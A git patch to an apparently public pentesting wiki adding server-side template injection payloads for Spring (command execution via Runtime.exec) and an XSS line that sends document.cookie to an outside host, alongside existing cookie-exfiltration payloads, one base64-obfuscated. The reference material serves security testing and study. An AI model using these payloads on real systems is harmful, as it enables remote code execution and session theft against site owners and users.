From 85571317f262210f12ae854ed1c41eb5dce680af Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Tue, 22 Sep 2020 09:07:48 +0000
Subject: [PATCH] GitBook: [master] 2 pages modified

---
 pentesting-web/ssti-server-side-template-injection.md | 7 +++++++
 pentesting-web/xss-cross-site-scripting/README.md     | 1 +
 2 files changed, 8 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md
index 85bee64a..8713075c 100644
--- a/pentesting-web/ssti-server-side-template-injection.md
+++ b/pentesting-web/ssti-server-side-template-injection.md
@@ -151,6 +151,13 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
 
 * [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
 
+### Spring View Manipulation \(Java\)
+
+* `__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x`
+* `__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x`
+
+[https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
+
 ### Smarty \(PHP\)
 
 #### More information
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 051e9a5c..cbbac5e4 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -522,6 +522,7 @@ A XSS occurs.
 <script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
 <script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
 <script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
+<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
 ```
 
 ### Port Scanner \(fetch\)